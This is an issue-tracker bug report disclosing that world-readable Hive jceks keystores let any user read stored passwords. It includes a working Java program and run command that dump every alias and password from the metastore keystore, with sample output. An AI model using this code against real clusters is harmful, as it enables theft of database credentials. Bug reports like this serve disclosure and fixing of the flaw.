HIVE-19746

Hadoop credential provider allows every user to read passwords



    • Type: Bug
    • Status: Open
    • Priority: Blocker
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels:


      This simple program allows reading any password from any jceks file:

      package com.test.app;

      import java.io.IOException;
      import java.util.List;

      import org.apache.hadoop.conf.Configuration;
      import org.apache.hadoop.security.alias.CredentialProvider;
      import org.apache.hadoop.security.alias.CredentialProviderFactory;

      public class PasswordReader {
        public static void main(String[] args) throws IOException {
          if (args == null || args.length == 0) {
            throw new IllegalArgumentException("Credential provider path is not set");
          }
          String credentialProviderPath = args[0];
          // Point the credential provider framework at the given jceks file
          Configuration configuration = new Configuration();
          configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
          // Take the first provider resolved from the path and list every alias it holds
          CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
          List<String> aliases = credentialProvider.getAliases();
          for (String alias : aliases) {
            // getPassword resolves the alias through the configured provider
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
          }
        }
      }

      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks

      javax.jdo.option.connectionpassword = 123456

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world-readable permissions here, because Hive is configured for impersonation to allow users other than hdfs to connect to HiveServer2. When I removed world-readable permissions and tried to connect as another user, I got this exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
          at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
          at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)

      Any ideas how to protect the passwords (say, restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time still be able to connect to HS2 as a non-admin user?


    • Assignee: Oleksiy Sayankin